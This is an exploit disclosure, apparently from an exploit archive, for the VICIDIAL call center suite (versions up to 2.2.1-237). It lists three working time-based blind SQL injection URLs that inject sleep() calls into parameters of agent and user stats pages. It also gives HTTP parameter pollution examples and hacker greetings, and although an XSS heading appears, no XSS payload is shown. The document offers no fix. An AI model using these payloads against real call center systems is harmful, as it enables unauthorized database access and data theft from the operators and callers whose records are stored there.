  #                                                                                  #
  #     ...:::::VICIDIAL call center suite Blind SQL Injection Vulnerability::::.... #         

                                  Sepahan TelCom IT Group (septelcom)
# Date: 2012-09-07
# Exploit Author: Sepahan TelCom IT Group (septelcom)
# Vendor Homepage: http://www.vicidial.org
# Software Link: https://sourceforge.net/project/showfiles.php?group_id=95133&package_id=101320
#Affected version: <=2.2.1-237

VICIDIAL is a set of programs that are designed to
interact with the Asterisk Open-Source PBX Phone system
to act as a complete inbound/outbound call center suite.

I'M hadihadi From Virangar Security Team

special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz

greetz to My best friends & partners in septelcom group : Reza Kazemian,Hossein Ghasemi



http://site.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07
http://site.com/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4
http://site.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)='

Sepahan TelCom Network And Security Group (septelcom)


E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net
  #                                                                                  #
  #     ...:::::VICIDIAL call center suite XSS/HTTP Prameter pollution::::....       #         

                                  Sepahan TelCom IT Group (septelcom)
# Date: 2012-09-07
# Exploit Author: Sepahan TelCom IT Group (septelcom)
# Vendor Homepage: http://www.vicidial.org
# Software Link: https://sourceforge.net/project/showfiles.php?group_id=95133&package_id=101320
#Affected version: <=2.2.1-237

VICIDIAL is a set of programs that are designed to
interact with the Asterisk Open-Source PBX Phone system
to act as a complete inbound/outbound call center suite.

I'M hadihadi From Virangar Security Team

special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz

greetz to My best friends & partners in septelcom group : Reza Kazemian,Hossein Ghasemi




HTTP Prameter plution:

example : /user_stats.php?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07&hadi685=sep148

example : ./admin.php?ADD=3&user=hadi&sep18=tell15

Sepahan TelCom Network And Security Group (septelcom)


E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net
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VICIDIAL Call Center Suite <=2.2.1-237 Multiple Vulnerabilities

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